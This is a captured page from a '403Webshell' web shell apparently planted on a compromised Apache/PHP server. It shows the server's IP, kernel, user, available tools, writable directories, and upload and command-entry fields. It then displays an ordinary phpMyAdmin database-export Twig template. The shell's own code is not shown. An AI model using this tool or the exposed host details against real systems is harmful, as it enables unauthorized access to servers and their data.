403Webshell
Server IP : 15.235.198.142  /  Your IP : 216.73.216.168
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ballsack 6.8.0-45-generic #45-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 30 12:02:04 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/thread-self/root/usr/share/phpmyadmin/templates/server/export/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/usr/share/phpmyadmin/templates/server/export/index.twig
{% extends 'export.twig' %}

{% block title %}{% trans 'Exporting databases from the current server' %}{% endblock %}

{% block selection_options %}
  <div class="card mb-3" id="databases_and_tables">
    <div class="card-header">{% trans 'Databases' %}</div>
    <div class="card-body">
      <div class="mb-3">
        <button type="button" class="btn btn-secondary" id="db_select_all">{% trans 'Select all' %}</button>
        <button type="button" class="btn btn-secondary" id="db_unselect_all">{% trans 'Unselect all' %}</button>
      </div>

      <select class="form-select" name="db_select[]" id="db_select" size="10" multiple aria-label="{% trans 'Databases' %}">
        {% for database in databases %}
          <option value="{{ database.name }}"{{ database.is_selected ? ' selected' }}>
            {{ database.name }}
          </option>
        {% endfor %}
      </select>
    </div>
  </div>
{% endblock %}

{% set filename_hint %}
  {% trans '@SERVER@ will become the server name.' %}
{% endset %}

Youez - 2016 - github.com/yon3zu
LinuXploit